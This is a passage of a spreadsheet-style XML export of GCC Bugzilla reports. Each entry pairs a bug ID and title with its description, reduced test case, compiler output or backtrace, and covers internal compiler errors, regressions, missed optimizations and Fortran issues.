	if (argc &lt; 2) {
		return 1
	}
	std::ofstream x(argv[1]std::ios::out)
	x&lt;&lt;Hello world&lt;&lt;std::endl
	return 0
}
Result:
End of search list.
In file included from /usr/local/gcc31/include/g++-v3/fstream:48
                 from fstream.cc:5:
/usr/local/gcc31/include/g++-v3/bits/basic_file.h:135: '__c_wfile_type' is used 
   as a type but is not defined as a type.
In file included from /usr/local/gcc31/include/g++-v3/bits/basic_file.h:262
                 from /usr/local/gcc31/include/g++-v3/fstream:48
                 from fstream.cc:5:
/usr/local/gcc31/include/g++-v3/i686-pc-linux-gnu/bits/basic_file_model.h: In 
   constructor `std::__basic_file::__basic_file(std::__c_lock*)':
/usr/local/gcc31/include/g++-v3/i686-pc-linux-gnu/bits/basic_file_model.h:39: class
   `std::__basic_file' does not have any field named `_M_cfile'
/usr/local/gcc31/include/g++-v3/i686-pc-linux-gnu/bits/basic_file_model.h:39: class
   `std::__basic_file' does not have any field named `_M_cfile_created'
Release:
GNU C++ version 3.1 20020302 (prerelease) (i686-pc-linux-gnu)
Environment:
Debian Woody Prerelease
How-To-Repeat:
Compile the attached source.</t>
  </si>
  <si>
    <t>axel.zeuner</t>
  </si>
  <si>
    <t>GCC-59049</t>
  </si>
  <si>
    <t>Two VOIDmode constant in comparison passed to cstoresi4</t>
  </si>
  <si>
    <t>For gcc.c-torture/execute/builtins/strlen-2.c compilation  -O1 with
target arc-elf I see an ICE in config/arc/arc.c:gen_compare_reg
as it has been passed a comparison for two VOIDmode constants:
(ne:SI (const_int 3 [0x3])
     (const_int 3 [0x3]))
We should not generate such comparisons.
[amylaar@rowan gcc]$ ./cc1 -fpreprocessed strlen-2.i -quiet -dumpbase strlen-2.c -auxbase strlen-2 -O1 -w -version -fno-diagnostics-show-caret -fdiagnostics-color=never -fno-tree-loop-distribute-patterns -o strlen-2.s
GNU C (GCC) version 4.9.0 20131024 (experimental) (arc-elf)
        compiled by GNU C version 4.8.1 20130603 (Red Hat 4.8.1-1) GMP version 5.1.1 MPFR version 3.1.1 MPC version 1.0.1
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
GNU C (GCC) version 4.9.0 20131024 (experimental) (arc-elf)
        compiled by GNU C version 4.8.1 20130603 (Red Hat 4.8.1-1) GMP version 5.1.1 MPFR version 3.1.1 MPC version 1.0.1
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: a28c59382a8f5b3c721a450c1591fc5d
/home/amylaar/synopsys/synopsys-gcc-mainline/unisrc-4.8/gcc/testsuite/gcc.c-torture/execute/builtins/strlen-2.c: In function â€˜main_testâ€™:
/home/amylaar/synopsys/synopsys-gcc-mainline/unisrc-4.8/gcc/testsuite/gcc.c-torture/execute/builtins/strlen-2.c:25:1: internal compiler error: in gen_compare_reg at config/arc/arc.c:1430
0x899316f gen_compare_reg(rtx_def* machine_mode)
        ../../gcc/gcc/config/arc/arc.c:1430
0x89cfa80 gen_cstoresi4(rtx_def* rtx_def* rtx_def* rtx_def*)
        ../../gcc/gcc/config/arc/arc.md:3208
0x85c8a6d insn_gen_fn::operator()(rtx_def* rtx_def* rtx_def* rtx_def*) const
        ../../gcc/gcc/recog.h:286
0x85c83b9 maybe_gen_insn(insn_code unsigned int expand_operand*)
        ../../gcc/gcc/optabs.c:8217
0x85c8604 maybe_expand_insn(insn_code unsigned int expand_operand*)
        ../../gcc/gcc/optabs.c:8243
0x83942ef emit_cstore
        ../../gcc/gcc/expmed.c:5121
0x8394a85 emit_store_flag_1
        ../../gcc/gcc/expmed.c:5362
0x8394b7c emit_store_flag(rtx_def* rtx_code rtx_def* rtx_def* machine_mode int int)
        ../../gcc/gcc/expmed.c:5405
0x83959ec emit_store_flag_force(rtx_def* rtx_code rtx_def* rtx_def* machine_mode int int)
        ../../gcc/gcc/expmed.c:5727
0x83ba5dd do_store_flag
        ../../gcc/gcc/expr.c:10832
0x83b1fb5 expand_expr_real_2(separate_ops* rtx_def* machine_mode expand_modifier)
        ../../gcc/gcc/expr.c:8787
0x83b9191 expand_expr_real_1(tree_node* rtx_def* machine_mode expand_modifier rtx_def**)
        ../../gcc/gcc/expr.c:10444
0x83ad831 expand_expr_real(tree_node* rtx_def* machine_mode expand_modifier rtx_def**)
        ../../gcc/gcc/expr.c:7796
0x83b3ab6 expand_expr_real_1(tree_node* rtx_def* machine_mode expand_modifier rtx_def**)
        ../../gcc/gcc/expr.c:9253
0x83ad831 expand_expr_real(tree_node* rtx_def* machine_mode expand_modifier rtx_def**)
        ../../gcc/gcc/expr.c:7796
0x831e807 expand_normal
        ../../gcc/gcc/expr.h:450
0x8320856 do_jump(tree_node* rtx_def* rtx_def* int)
        ../../gcc/gcc/dojump.c:608
0x831fa22 do_jump_1(tree_code tree_node* tree_node* rtx_def* rtx_def* int)
        ../../gcc/gcc/dojump.c:364
0x831e918 jumpifnot_1(tree_code tree_node* tree_node* rtx_def* int)
        ../../gcc/gcc/dojump.c:114
0x82af4bd expand_gimple_cond
        ../../gcc/gcc/cfgexpand.c:2030
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
emit_cstore has generated this comparison.  I propose to use copy_to_mode_reg
in this case to preserve the information about the mode.
I see that for the testcase the unnecessary instructions are removed in
the ce1 pass.</t>
  </si>
  <si>
    <t>GCC-78038</t>
  </si>
  <si>
    <t>[5 Regression] internal compiler error: in get_sub_rtx at ree.c:655</t>
  </si>
  <si>
    <t>Created attachment 39840
Test source file
Dear GCC maintainers
we found that gcc / g++ crashes with internal compiler error in get_sub_rtx at ree.c:655 at optimization level -O2
Target plattform is aarch64-elf in detail -march=armv8-a -mabi=ilp32
It seems the the order of the statements especially the call to a function pointer and use of global register variable is important. Unfortunately I could not determine a dedicated optimization option causing the problem.
Thanks for in advance for any help.
-------------------------------------------------------------------------------
aarch64-elf-g++ -v
Using built-in specs.
COLLECT_GCC=aarch64_gcc_elf_6.1.0\bin\aarch64-elf-g++
COLLECT_LTO_WRAPPER=aarch64_gcc_elf_6.1.0/bin/../libexec/gcc/aarch64-elf/6.1.0/lto-wrapper.exe
Target: aarch64-elf
Configured with: ../../gcc-6.1.0//configure --host=x86_64-w64-mingw32 --build=x86_64-w64-mingw32 --prefix=/build/aarch64-elf_6.1.0_x64/cross-gcc/aarch64-elf --target=aarch64-elf --disable-nls --enable-multilib --with-multilib-list=lp64ilp32 --enable-languages=cc++ --disable-decimal-float --with-sysroot=/build/aarch64-elf_6.1.0_x64/cross-gcc/aarch64-elf --without-headers --disable-shared --disable-threads --disable-lto --disable-libmudflap --disable-libssp --disable-libgomp --disable-libffi --disable-libstdcxx-pch --disable-win32-registry --with-host-libstdcxx='-static-libgcc -Wl-Bstatic-lstdc++-Bdynamic -lm' --with-newlib --with-gcc --with-gnu-as --with-gnu-ld --with-gmp=/build/aarch64-elf_6.1.0_x64/host --with-mpfr=/build/aarch64-elf_6.1.0_x64/host --with-mpc=/build/aarch64-elf_6.1.0_x64/host --with-isl=/build/aarch64-elf_6.1.0_x64/host : (reconfigured) ../../gcc-6.1.0//configure --host=x86_64-w64-mingw32 --build=x86_64-w64-mingw32 --enable-languages=cc++ --enable-multilib --with-multilib-list=lp64ilp32 --disable-lto --disable-libmudflap --disable-libssp --disable-libgomp --disable-libffi --with-newlib --with-gcc --with-gnu-ld --with-gnu-as --with-stabs --disable-shared --disable-threads --disable-win32-registry --disable-nls --disable-libstdcxx-pch --with-host-libstdcxx='-static-libgcc -Wl-Bstatic-lstdc++-Bdynamic -lm' --target=aarch64-elf --prefix=/build/aarch64-elf_6.1.0_x64/cross-gcc/aarch64-elf --with-gmp=/build/aarch64-elf_6.1.0_x64/host --with-mpfr=/build/aarch64-elf_6.1.0_x64/host --with-mpc=/build/aarch64-elf_6.1.0_x64/host --with-isl=/build/aarch64-elf_6.1.0_x64/host --with-sysroot=/build/aarch64-elf_6.1.0_x64/cross-gcc/aarch64-elf
Thread model: single
gcc version 6.1.0 (GCC)
-------------------------------------------------------------------------------
// Test file test.cpp:
typedef void (*test_fptr_t)(void)
void test_f (void) { }
test_fptr_t test_fptr = test_f
struct test2_s
{
  int f
}
register struct test2_s *g __asm__(x28)
void do_something()
{
  test_fptr()
  struct test2_s *p1 = 0
  *p1 = *g
}
-------------------------------------------------------------------------------
aarch64-elf-g++ -mabi=ilp32 -O2 -march=armv8-a -c -o test.o test.cpp</t>
  </si>
  <si>
    <t>ktkachov</t>
  </si>
  <si>
    <t>GCC-5806</t>
  </si>
  <si>
    <t>The preprocessor evaluates expression s in 64-bit violating IS C++ 16.1.4</t>
  </si>
  <si>
    <t>The preprocessor evaluates expressions using 64-bits violating ISO C++ 16.1.4 and 5.19. The problems is generic and can be easily reproduced. This causes the 32/64 bit test on Sequent provided header files to be incorrectly parsed.
The vendor compilers work according to the standard.
Release:
GCC 3.0.4 and possibly GCC 3.1
Environment:
AIX Solaris Sequent and others
How-To-Repeat:
On Solaris (64-bit):
cc ed.c
a.out
cc -xarch=v9 ed.c   (64-bit build)
a.out
gcc ed.c
a.out
On all OS's:
cc ed.c
a.out
gcc ed.c
a.out</t>
  </si>
  <si>
    <t>eric_dana</t>
  </si>
  <si>
    <t>GCC-40971</t>
  </si>
  <si>
    <t>[4.4 Regression] ICE in memory_address</t>
  </si>
  <si>
    <t>extern void bar (char *)
void
foo (int f long a)
{
  {
    char d[32768]
    bar (d)
  }
  double b = f
  while (a)
    {
      char c[8]
      __builtin_memcpy (c 
      if (*(double *) c != 2.0)
break
    }
}
ICEs on powerpc-linux when compiled with -O -m32 -fstack-protector.
(plus:SI (reg:SI 150)
    (const_int 32764 [0x7ffc]))
is not valid memory_address_p for DFmode because that address offsetted by 4 isn't a valid offset.</t>
  </si>
  <si>
    <t>GCC-55877</t>
  </si>
  <si>
    <t>[4.7/4.8/4.9 Regression] Anon visibility issues</t>
  </si>
  <si>
    <t>typedef struct {
  typedef enum { X Y } A
  typedef struct { } B
  struct C { }
} D
void foo (D) {}
void foo (D::A) {}
void foo (D::B) {}
void foo (D::C) {}
Starting with PR54883 the foo (D::A) gets anon visibility in 4.4 all 4 foo functions had default visibility starting with 4.5 the last two had anon visibility.</t>
  </si>
  <si>
    <t>GCC-42574</t>
  </si>
  <si>
    <t>[4.3/4.4/4.5/4.6 Regression] Address of global variable is calculated multiple times (missed CSE)</t>
  </si>
  <si>
    <t>The following code  (by Alex Vod.)
struct A {
 char a[400]
 float* c
}
struct A glob
void func()
void func1(float*)
int func2(float* int*)
void func3(float*)
void test(int *p) {
 func1(glob.c)
 if (func2(glob.c p)) {
   func()
 }
 func3(glob.c)
}
is compiled by gcc 4.2.1 to 56 bytes and 4.4.0 to 64 bytes. The problem is that it calculates address glob.c *twice* but there is no need to - it doesn't change as glob is a global variable.
gcc 4.2.1 output:
       push    {r4 r5 r6 lr}
       ldr     r3 .L5
       ldr     r2 .L5+4
.LPIC0:
       add     r3 pc
       ldr     r5 [r3 r2]
       mov     r6 #200
       lsl     r6 r6 #1
       mov     r4 r0
       ldr     r0 [r5 r6]
       bl      func1
       ldr     r0 [r5 r6]
       mov     r1 r4
       bl      func2
       cmp     r0 #0
       beq     .L2
       bl      func
.L2:
       ldr     r0 [r5 r6]
       bl      func3
       @ sp needed for prologue
       pop     {r4 r5 r6 pc}
gcc 4.4.0 output:
       push    {r3 r4 r5 r6 r7 lr}
       ldr     r4 .L5
       ldr     r3 .L5+4
.LPIC0:
       add     r4 pc
       ldr     r6 [r4 r3]
       mov     r5 #200
       lsl     r5 r5 #1
       mov     r7 r0
       ldr     r0 [r6 r5]
       bl      func1
       ldr     r0 [r6 r5]
       mov     r1 r7
       bl      func2
       cmp     r0 #0
       beq     .L2
       bl      func
.L2:
       ldr     r3 .L5+4
       @ sp needed for prologue
       ldr     r2 [r4 r3]
       mov     r3 #200   // this is the calculation of glob.c address
       lsl     r3 r3 #1    // it is redundant as r5 already contains #400
       ldr     r0 [r2 r3]
       bl      func3
       pop     {r3 r4 r5 r6 r7 pc}
I believe gcc 4.2.1 works correctly due to RTL CSE pass.
Before CSE:
 Start of basic block 4 registers live: (nil)
(code_label 34 33 35 4 2  [1 uses])
(note 35 34 37 4 [bb 4] NOTE_INSN_BASIC_BLOCK)
(insn 37 35 38 4 (set (reg:SI 113) // put attention to this insn
       (unspec:SI [
               (symbol_ref:SI (glob) )
           ] 3)) 148 {pic_load_addr_thumb} (nil)
   (nil))
(insn 38 37 39 4 (set (reg/f:SI 112)   // put attention to this insn
       (mem/u/c:SI (plus:SI (reg:SI 103)
               (reg:SI 113)) [0 S4 A32])) 146 {*thumb_movsi_insn} (nil)
   (expr_list:REG_EQUAL (symbol_ref:SI (glob) )
       (nil)))
(insn 39 38 40 4 (set (reg:SI 114)             // put attention to this insn
       (const_int 400 [0x190])) 146 {*thumb_movsi_insn} (nil)
   (nil))
(insn 40 39 41 4 (set (reg:SI 115 [ glob.c ])
       (mem/s/f/c:SI (plus:SI (reg/f:SI 112)
               (reg:SI 114)) [5 glob.c+0 S4 A32])) 146 {*thumb_movsi_insn} (nil)
   (nil))
(insn 41 40 42 4 (set (reg:SI 0 r0 [ glob.c ])
       (reg:SI 115 [ glob.c ])) 146 {*thumb_movsi_insn} (nil)
   (nil))
(call_insn 42 41 43 4 (parallel [
           (call (mem:SI (symbol_ref:SI (func3) [flags 0x41] ) [0 S4 A32])
               (const_int 0 [0x0]))
           (use (const_int 0 [0x0]))
           (clobber (reg:SI 14 lr))
       ]) 231 {*call_insn} (nil)
   (nil)
   (expr_list:REG_DEP_TRUE (use (reg:SI 0 r0 [ glob.c ]))
       (nil)))
 End of basic block 4 registers live:
after CSE:
 Start of basic block 4 registers live: (nil)
(code_label 34 33 35 4 2  [1 uses])
(note 35 34 40 4 [bb 4] NOTE_INSN_BASIC_BLOCK)
(insn 40 35 41 4 (set (reg:SI 115 [ glob.c ]) // all mentioned instructions were removed
       (mem/s/f/c:SI (plus:SI (reg/f:SI 104)
               (reg:SI 106)) [5 glob.c+0 S4 A32])) 146 {*thumb_movsi_insn} (nil)
   (nil))
(insn 41 40 42 4 (set (reg:SI 0 r0 [ glob.c ])
       (reg:SI 115 [ glob.c ])) 146 {*thumb_movsi_insn} (nil)
   (nil))
(call_insn 42 41 43 4 (parallel [
           (call (mem:SI (symbol_ref:SI (func3) [flags 0x41] ) [0 S
4 A32])
               (const_int 0 [0x0]))
           (use (const_int 0 [0x0]))
           (clobber (reg:SI 14 lr))
       ]) 231 {*call_insn} (nil)
   (nil)
   (expr_list:REG_DEP_TRUE (use (reg:SI 0 r0 [ glob.c ]))
       (nil)))
 End of basic block 4 registers live:
For some reason this CSE pass doesn't work in gcc 4.3.1 or gcc-4.4.0</t>
  </si>
  <si>
    <t>mkuvyrkov</t>
  </si>
  <si>
    <t>sliao</t>
  </si>
  <si>
    <t>GCC-56867</t>
  </si>
  <si>
    <t>Missing temporary with string array assignment</t>
  </si>
  <si>
    <t>And I thought we were done with missing temporaries...
ig25@linux-fd1f:~/Krempel/Dep-12&gt; gfortran bar.f90
ig25@linux-fd1f:~/Krempel/Dep-12&gt; ./a.out
23cd
2334
33yz
ig25@linux-fd1f:~/Krempel/Dep-12&gt; gfortran-4.6 bar.f90
ig25@linux-fd1f:~/Krempel/Dep-12&gt; ./a.out
23cd
2334
33yz
ig25@linux-fd1f:~/Krempel/Dep-12&gt; gfortran-4.7 bar.f90
ig25@linux-fd1f:~/Krempel/Dep-12&gt; ./a.out
23cd
2334
33yz
Of course the last line of output should be
23yz.</t>
  </si>
  <si>
    <t>GCC-61391</t>
  </si>
  <si>
    <t>[5 Regression] ICE in execute_one_pass at -O3 and above</t>
  </si>
  <si>
    <t xml:space="preserve">At least 4.10.0-alpha20140525 and newer ICEs when compiling the following code at -O3 or -Ofast:
short int u
int h
int i
void
p(void)
{
  int c[2] = { 0 }
  for (h = 0 h &lt; 2 ++h) {
    static int *l = 
    int t
    int n
    for (t = 0 t &lt; 7 ++t)
      c[0] = (i 
  }
}
f55ba4cd.c: In function 'p':
f55ba4cd.c:6:1: internal compiler error: Segmentation fault
 p(void)
 ^
Unfortunately I cannot provide a meaningful stack trace because stack seems to be corrupted. The last active frame seems to be of execute_one_pass(opt_pass*) and gdb disassemble gives the following on x86_64:
   0x00000000008047b7 :	xor    %eax%eax
   0x00000000008047b9 :	jmpq   0x804630 
   0x00000000008047be :	mov    0x0(%rbp)%rax
   0x00000000008047c2 :	mov    0xb12b4f(%rip)%rsi        # 0x1317318 
   0x00000000008047c9 :	mov    %rbp%rdi
   0x00000000008047cc :	callq  *0x20(%rax)
=&gt; 0x00000000008047cf :	mov    %eax%r13d
   0x00000000008047d2 :	xor    %esi%esi
   0x00000000008047d4 :	mov    $0x8023f0%edi
   0x00000000008047d9 :	callq  0x802af2
   0x00000000008047de :	jmp    0x804795 
   0x00000000008047e0 :	test   %rsi%rsi
   0x00000000008047e3 :	jne    0x8047f3 
   0x00000000008047e5 :	cmpq   $0x00xbc1bbb(%rip)        # 0x13c63a8 
</t>
  </si>
  <si>
    <t>GCC-44768</t>
  </si>
  <si>
    <t>arm-linux bootstrap broken on expmed.c:157:3: warning ICE</t>
  </si>
  <si>
    <t>OK at rev 160819
KO at rev 160869
/home/guerby/build/./prev-gcc/xgcc -B/home/guerby/build/./prev-gcc/ -B/n/57/guerby/install-trunk-160869/armv5tel-unknown-linux-gnueabi/bin/ -B/n/57/guerby/install-trunk-160869/armv5tel-unknown-linux-gnueabi/bin/ -B/n/57/guerby/install-t\
runk-160869/armv5tel-unknown-linux-gnueabi/lib/ -isystem /n/57/guerby/install-trunk-160869/armv5tel-unknown-linux-gnueabi/include -isystem /n/57/guerby/install-trunk-160869/armv5tel-unknown-linux-gnueabi/sys-include    -c   -g -O2 -DIN_\
GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror -Wold-style-definition -Wc++-compat -fno-common\
 -Wno-error -DHAVE_CONFIG_H -I. -I. -I../../trunk/gcc -I../../trunk/gcc/. -I../../trunk/gcc/../include -I../../trunk/gcc/../libcpp/include  -I../../trunk/gcc/../libdecnumber -I../../trunk/gcc/../libdecnumber/dpd -I../libdecnumber     ..\
/../trunk/gcc/expmed.c -o expmed.o
../../trunk/gcc/expmed.c: In function 'init_expmed':
../../trunk/gcc/expmed.c:157:3: warning: array subscript is above array bounds [-Warray-bounds]
xgcc: internal compiler error: Segmentation fault (program cc1)
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[3]: *** [expmed.o] Error 4
make[3]: Leaving directory `/home/guerby/build/gcc'
make[2]: *** [all-stage3-gcc] Error 2
make[2]: Leaving directory `/home/guerby/build'
make[1]: *** [stage3-bubble] Error 2
make[1]: Leaving directory `/home/guerby/build'
make: *** [bootstrap] Error 2
Might be caused by:
2010-06-16  DJ Delorie  
	* common.opt (-fstrict-volatile-bitfields): new.
        * doc/invoke.texi: Document it.
	* fold-const.c (optimize_bit_field_compare): For volatile
        bitfields use the field's type to determine the mode not the
	field's size.
        * expr.c (expand_assignment): Likewise.
        (get_inner_reference): Likewise.
        (expand_expr_real_1): Likewise.
	* expmed.c (store_fixed_bit_field): Likewise.
        (extract_bit_field_1): Likewise.
	(extract_fixed_bit_field): Likewise.</t>
  </si>
  <si>
    <t>GCC-22509</t>
  </si>
  <si>
    <t>[4.1 regression] elemental.f90 testsuite failure (-fweb)</t>
  </si>
  <si>
    <t>This fails with
$ gfortran -O3 -funroll-loops elemental.f90
$ ./a.out
Aborted
Slightly reduced:
$ cat elemental-reduced.f90
! Program to test elemental functions.
program test_elemental
   implicit none
   integer(kind = 4) dimension (2 4) :: a
   integer(kind = 4) dimension (2 4) :: b
   integer(kind = 8) dimension(2) :: c
   a = reshape ((/2 3 4 5 6 7 8 9/) (/2 4/))
   b = 0
   b(2 :) = e_fn (a(1 :) 1)
   if (any (b .ne. reshape ((/0 1 0 3 0 5 0 7/) (/2 4/)))) call abort
   a = e_fn (a(: 4:1:-1) 1 + b)
   print '(8I4)'a
   if (any (a .ne. reshape ((/7 7 5 3 3 -1 1 -5/) (/2 4/)))) call abort
contains
elemental integer function e_fn (p q)
   integer intent(in) :: p q
   e_fn = p - q
end function
end program
$ cat elemental-reduced.f90
! Program to test elemental functions.
program test_elemental
   implicit none
   integer(kind = 4) dimension (2 4) :: a
   integer(kind = 4) dimension (2 4) :: b
   integer(kind = 8) dimension(2) :: c
   a = reshape ((/2 3 4 5 6 7 8 9/) (/2 4/))
   b = 0
   b(2 :) = e_fn (a(1 :) 1)
   if (any (b .ne. reshape ((/0 1 0 3 0 5 0 7/) (/2 4/)))) call abort
   a = e_fn (a(: 4:1:-1) 1 + b)
   print '(8I4)'a
   if (any (a .ne. reshape ((/7 7 5 3 3 -1 1 -5/) (/2 4/)))) call abort
contains
elemental integer function e_fn (p q)
   integer intent(in) :: p q
   e_fn = p - q
end function
end program
$ gfortran elemental-reduced.f90 &amp;&amp; ./a.out
   7   7   5   3   3  -1   1  -5
$ gfortran -O3 elemental-reduced.f90 &amp;&amp; ./a.out
   7   7   5   3   3  -1   1  -5
$ gfortran -O3 -funroll-loops elemental-reduced.f90 &amp;&amp; ./a.out
   7   7   5   3   4  -3   6  -1
Aborted</t>
  </si>
  <si>
    <t>GCC-44926</t>
  </si>
  <si>
    <t>[OOP] Ambiguous interface not detected</t>
  </si>
  <si>
    <t>Follow up to PR 44434.
Test case: attachment 20850
While gfortran compiles the program both ifort and crayftn reject it with:
aaa.f90(98): error #8443: This generic type bound procedure reference has two or more specific procedures with the same type/rank/keyword signature.   [CSGET]
    call a%a%csget(iresinfo)
ftn-487 crayftn: ERROR D_BASE_MAT_MOD File = aaa.f90 Line = 33 Column = 37
  The specific interfaces for D_XXX_GET and BASE_CSGETP make the GENERIC interface CSGET ambiguous.</t>
  </si>
  <si>
    <t>GCC-47076</t>
  </si>
  <si>
    <t>objc</t>
  </si>
  <si>
    <t>Protocol referenced in @interface declarations should be defined</t>
  </si>
  <si>
    <t>All the protocols in the list of protocols in an @interface declaration should have been defined forward-references are not enough.  Here is a testcase --
/* Contributed by Nicola Pero  December 2010.  */
/* { dg-do compile } */
/* Test that all protocols appearing in @interface declarations are                                                                                                                                              
   real (ie we saw a full @protocol definition with list of methods)                                                                                                                                           
   and not just forward-references (ie @protocol NSObject).  */
#include 
@protocol MyProtocol
@protocol MyProtocol2
- (int)method2
@end
@interface MyClass  /* { dg-warning definition of protocol .MyProtocol. not found } */
@end
@interface MyClass2  /* Ok */
@end
@interface MyClass2 (Category)   /* { dg-warning definition of protocol .MyProtocol. not found } */
@end
Thanks</t>
  </si>
  <si>
    <t>nicola</t>
  </si>
  <si>
    <t>GCC-23929</t>
  </si>
  <si>
    <t>[4.1 Regression] segfault in expand_simple_operations tree-ssa-loop-niter.c:637</t>
  </si>
  <si>
    <t>following testcase (extracted from libgphoto2) segfaults 
the compiler on amd64. 
/home/marcus/projects/gcc/BIN/bin/gcc     -O2   -c library.i   
library.i: In function 'f': 
library.i:1: internal compiler error: Segmentation fault 
Please submit a full bug report 
with preprocessed source if appropriate. 
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-65234</t>
  </si>
  <si>
    <t>Output descriptor (*(1E15.7)) not accepted</t>
  </si>
  <si>
    <t>An output descriptor of the kind
'(*(1E15.7))' 
is not accepted by the gfortran runtime library but the error message:
Fortran runtime error: '*' requires at least one associated data descriptor
(*(1E15.7))         
         ^
is emitted. Now for a repeat specifier of 1 this makes not much sense besides that F2003 and F2008 seem to define this kind of output specifier to be valid. See F2008 10.3.1:
R1003 format-items is format-item [ [  ] format-item ] ...
R1004 format-item is [ r ] data-edit-desc
                  or control-edit-desc
                  or char-string-edit-desc
                  or [ r ] ( format-items )
R1005 unlimited-format-item is * ( format-items )
R1006 r is int-literal-constant
What for example if one wants to emit/read an even number of floats like with:
'(*(2E15.7))'? 
During research Dominique and Tobias found that '(*(2(E15.7)))' is accepted.
The attached example shows that '(*(2(E15.7)))' is accepted while '(*(2E15.7))' not.</t>
  </si>
  <si>
    <t>vehre</t>
  </si>
  <si>
    <t>GCC-50407</t>
  </si>
  <si>
    <t>compiler confused by .operator.</t>
  </si>
  <si>
    <t>Created attachment 25283
just compile it
compiler confused by .operator.</t>
  </si>
  <si>
    <t>zeccav</t>
  </si>
  <si>
    <t>GCC-31219</t>
  </si>
  <si>
    <t>ICE on array of character function results</t>
  </si>
  <si>
    <t>A recent gfortran ICEs on the following code:
INTEGER :: J
CHARACTER(LEN=8) :: str
J=3
write(str'(2A4)') (/(F(IJ)I=12)/)
IF (str.NE. ODD EVE) CALL ABORT()
CONTAINS
 FUNCTION F(KJ) RESULT(I)
  INTEGER :: KJ
  CHARACTER(LEN=J) :: I
  IF (MODULO(K2).EQ.0) THEN
     I=EVEN
  ELSE
     I=ODD
  ENDIF
 END FUNCTION
END</t>
  </si>
  <si>
    <t>GCC-38586</t>
  </si>
  <si>
    <t>quadratic behaviour in find_temp_slot_from_address.</t>
  </si>
  <si>
    <t>This is split off from PR38474 for clarity see steven's comment #35 in that PR.
Compiling the testcase of that PR 
(http://gcc.gnu.org/bugzilla/attachment.cgi?id=16873)
should be illuminating</t>
  </si>
  <si>
    <t>GCC-44418</t>
  </si>
  <si>
    <t>FAIL: gcc.target/powerpc/recip-[123].c on powerpc-apple-darwin9</t>
  </si>
  <si>
    <t>Since revision 160215 (see http://gcc.gnu.org/ml/gcc-testresults/2010-06/msg00263.html ) one gets the following failures on powerpc-apple-darwin9:
FAIL: gcc.target/powerpc/recip-1.c scan-assembler-times frsqrte 2
FAIL: gcc.target/powerpc/recip-1.c scan-assembler-times fmsub 2
FAIL: gcc.target/powerpc/recip-1.c scan-assembler-times fmul 8
FAIL: gcc.target/powerpc/recip-2.c scan-assembler-times frsqrtes 1
FAIL: gcc.target/powerpc/recip-2.c scan-assembler-times fmsubs 1
FAIL: gcc.target/powerpc/recip-2.c scan-assembler-times fmuls 6
FAIL: gcc.target/powerpc/recip-2.c scan-assembler-times fnmsubs 3
FAIL: gcc.target/powerpc/recip-2.c scan-assembler-times fsqrt 1
FAIL: gcc.target/powerpc/recip-3.c scan-assembler-times frsqrtes 1
FAIL: gcc.target/powerpc/recip-3.c scan-assembler-times fmsubs 1
FAIL: gcc.target/powerpc/recip-3.c scan-assembler-times fmuls 4
I'll attach the assemby files for these tests.</t>
  </si>
  <si>
    <t>GCC-20533</t>
  </si>
  <si>
    <t>documentation: attribute 'used' applied to a variable</t>
  </si>
  <si>
    <t>See related discussion in Bug #20319 and at
http://gcc.gnu.org/ml/gcc/2005-03/msg00450.html
The used attribute is described only under function attributes
and not under variable attributes in the documentation:
used
This attribute attached to a function means that code must be emitted for 
the function even if it appears that the function is not referenced. This is 
useful for example when the function is referenced only in inline assembly. 
(see: http://gcc.gnu.org/onlinedocs/gcc-3.4.3/gcc/Function-
Attributes.html#Function-Attributes)
It would be helpful if the documentation were updated to describe the
behavior of the `used' attribute when apllied to variables.</t>
  </si>
  <si>
    <t>gary</t>
  </si>
  <si>
    <t>GCC-5863</t>
  </si>
  <si>
    <t>Cannot compile glibc for powerpc-linux-gnu</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/20020103-1.c scan-assembler-not LC
Release:
gcc version 3.1 20020307 (prerelease)
How-To-Repeat:
Compile gcc.dg/20020103-1.c with -O2 -fpic</t>
  </si>
  <si>
    <t>franz.sirl-kernel</t>
  </si>
  <si>
    <t>GCC-4408</t>
  </si>
  <si>
    <t>apparent namespace collision with global variable 'count'</t>
  </si>
  <si>
    <t>NewHandler.cpp: In function `void out_of_memory()':
NewHandler.cpp:16: use of `count' is ambiguous
NewHandler.cpp:12:   first declared as `int count' here
/usr/local/include/g++-v3/bits/stl_algo.h:320:   also declared as `typename 
   std::iterator_traits::difference_type std::count(_InputIter 
   _InputIter const _Tp&amp;)' here
NewHandler.cpp: In function `int main()':
NewHandler.cpp:23: use of `count' is ambiguous
NewHandler.cpp:12:   first declared as `int count' here
/usr/local/include/g++-v3/bits/stl_algo.h:320:   also declared as `typename 
   std::iterator_traits::difference_type std::count(_InputIter 
   _InputIter const _Tp&amp;)' here
Release:
g++ 3.0.1
Environment:
Cygwin under Win2000
How-To-Repeat:
Compile attached file</t>
  </si>
  <si>
    <t>GCC-46785</t>
  </si>
  <si>
    <t>Doesn't vectorize reduction x += y*y</t>
  </si>
  <si>
    <t>When looking at why GCC is so slow with the himeno benchmark in the usual
Phoronix testing I noticed that we do not vectorize the reduction in
float x[1024]
float
test (void)
{
  int i
  float gosa = 0.0
  for (i = 0 i &lt; 1024 ++i)
    {
      float tem = x[i]
      gosa += tem * tem
    }
  return gosa
}
because at analysis time we have
D.3171_6 = __builtin_powf (tem_5 2.0e+0)
as the def for the addition which doesn't satisfy is_gimple_assign
nor any of the vinfo tests:
$3 = {type = undef_vec_info_type live = 0 '\000' in_pattern_p = 0 '\000' 
  read_write_dep = 0 '\000' stmt = 0x7ffff7edc908 loop_vinfo = 0x18f77e0 
  vectype = 0x0 vectorized_stmt = 0x0 data_ref_info = 0x0 
  dr_base_address = 0x0 dr_init = 0x0 dr_offset = 0x0 dr_step = 0x0 
  dr_aligned_to = 0x0 related_stmt = 0x0 same_align_refs = 0x18cf7f0 
  def_type = vect_internal_def slp_type = loop_vect first_dr = 0x0 
  next_dr = 0x0 same_dr_stmt = 0x0 size = 0 store_count = 0 gap = 0 
  relevant = vect_unused_in_scope cost = {outside_of_loop = 0 
    inside_of_loop = 0} bb_vinfo = 0x0 vectorizable = 1 '\001'}
As we want to allow internal defs we can also just let calls slip through
